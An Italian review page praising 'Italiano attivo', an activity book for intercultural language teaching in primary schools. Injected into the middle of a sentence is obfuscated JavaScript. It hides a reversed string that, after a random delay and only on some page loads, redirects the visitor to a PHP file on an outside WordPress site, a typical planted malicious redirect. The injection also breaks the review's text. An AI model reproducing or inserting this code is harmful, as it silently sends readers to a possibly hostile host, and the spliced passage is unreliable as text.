Per insegnanti flessibili

image_pdfimage_print

Nel panorama dei libri di attività per l’educazione linguistica in italiano lingua materna o lingua seconda, il libro Italiano attivo ha una caratteristica particolare che lo rende prezioso: è un libro immediatamente utilizzabile da qualunque maestra in qualunque contesto.
Le autrici hanno inventato o adattato ad un’ottica interculturale attività di educazione linguistica rivolte al primo e secondo ciclo della scuola elementare.
La particolarità è la praticità delle indicazioni poste a corredo di materiale in gran parte fotocopiabile. Le indicazioni seguono l’insegnante per ogni tappa delle attività, suggerendo possibili variazioni ed espansioni.
Sono attività e materiali provati dalle autrici: una maestra elementare di gr (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ande esperienza, l’altra insegnante di italiano a stranieri minori e adulti; entrambe formatrici.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *